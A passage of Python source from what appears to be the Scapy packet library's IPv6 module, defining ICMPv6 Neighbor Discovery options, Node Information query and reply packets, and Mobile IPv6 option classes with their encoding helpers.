IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class _IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += b'\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return b""
if l in [2, 3]:
return x[:8*(l-1)]
return x + b'\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x//8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
_IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
# described in section 3.1 of RFC 1035
# XXX Label should be at most 63 octets in length : we do not enforce it
# Total length of domain should be 255 : we do not enforce it either
class DomainNameListField(StrLenField):
__slots__ = ["padded"]
islist = 1
padded_unit = 8
def __init__(self, name, default, fld=None, length_from=None, padded=False):
self.padded = padded
StrLenField.__init__(self, name, default, fld, length_from)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def m2i(self, pkt, x):
x = plain_str(x)
res = []
while x:
# Get a name until \x00 is reached
cur = []
while x and x[0] != b'\x00':
l = ord(x[0])
cur.append(x[1:l+1])
x = x[l+1:]
if self.padded:
# Discard following \x00 in padded mode
if len(cur):
res.append(".".join(cur) + ".")
else:
# Store the current name
res.append(".".join(cur) + ".")
if x and x[0] == b'\x00':
x = x[1:]
return res
def i2m(self, pkt, x):
def conditionalTrailingDot(z):
if z and z[-1] == b'\x00':
return z
return z+b'\x00'
# Build the encode names
tmp = [[chb(len(z)) + z for z in y.split('.')] for y in x]
ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
# In padded mode, add some \x00 bytes
if self.padded and not len(ret_string) % self.padded_unit == 0:
ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)
return ret_string
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1+ x//8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8*pkt.len -8,
padded=True)
]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return raw(self.tgt)+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return raw(self.tgt)+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", b"\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be nice to take the L2 address
# requested in the mandatory target lladdr option and use it as the
# Ethernet destination address if no address is specified.
# - That does not seem very practical if the user has to specify all
# the options anyway.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
# Required options: target lladdr, target address list
# Other valid options: MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
# dnsrepr2names(). It should be possible to disable it.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
@conf.commands.register
def computeNIGroupAddr(name):
"""Compute the NI group Address. Can take a FQDN as input parameter"""
import hashlib # the old 'md5' module is deprecated; hashlib works everywhere
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = hashlib.md5(record.encode("utf8"))
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
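# Example (added for illustration): only the first label of the name is used,
# e.g. computeNIGroupAddr("www.example.com") hashes "\x03www" with MD5 and
# returns an address of the form "ff02::2:xxxx:yyyy" built from the first
# 4 bytes of the digest.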
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specific
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overridden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overridden
# - Name in the other cases: code is set to 0, if not overridden by user
#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
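# Illustrative sketch (assumed): with the query classes defined further below,
# the smart 'data' field stores (type, value) pairs and drives the code field:
#
#   ICMPv6NIQueryIPv6(data="2001:db8::1")   # stored as (0, ...), code -> 0
#   ICMPv6NIQueryName(data="example.com")   # stored as (1, ...), code -> 1
#   ICMPv6NIQueryIPv4(data="192.0.2.1")     # stored as (2, ...), code -> 2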
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if isinstance(x, str):
if x and x[-1] == '\x00': # stupid heuristic
return x.encode("utf8")
x = [x.encode("utf8")]
elif type(x) is bytes:
if x and x[-1] == 0:
return x
res = []
for n in x:
termin = b"\x00"
if n.count(b'.') == 0: # single-component gets one more
termin += b'\x00'
n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
res.append(n)
return b"".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
If the provided string is already in printable format
(i.e. does not end with a null character), a one-element
list is returned. Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
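# Example (added for illustration): the reverse operation,
#   dnsrepr2names('\x03www\x07example\x03com\x00')  # -> ['www.example.com']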
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
if isinstance(x, tuple) and isinstance(x[0], int):
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
t,val = x
val = plain_str(val)
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return b"", (1, s)
def addfield(self, pkt, s, val):
if ((isinstance(val, tuple) and val[1] is None) or
val is None):
val = (1, b"")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
_nireply_code = { 0: "Successful Reply",
1: "Response Refusal",
3: "Unknown query type" }
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
# (0, "some string") : unknow qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decodes it for the user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if not isinstance(x, tuple):
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if isinstance(x, str): # listify the string
x = [x]
if isinstance(x, list) and x and not isinstance(x[0], int): # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if isinstance(x, str):
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if isinstance(x, str):
return (0, x)
return x
return (qtype, [addttl(d) for d in x])
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = b""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0])+inet_pton(socket.AF_INET6, x_y1[1]), tmp))
elif t == 4:
return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0])+inet_pton(socket.AF_INET, x_y2[1]), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, b"")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
elif qtype == 2:
if len(s) < 4:
return s, (0, b"")
ttl = struct.unpack("!I", s[:4])[0]
return b"", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return b"", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if isinstance(x, tuple) and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
if x == 0 and y ==0:
return 0
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
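# Worked example (added for illustration): same formula as for the IPv6
# Hop-by-Hop options above; e.g. MIP6OptAltCoA (8n+6) starting at curpos=4
# yields 8*((4 - 6 + 8 - 1)//8) + 6 - 4 = 2, i.e. a PadN with empty optdata.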
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
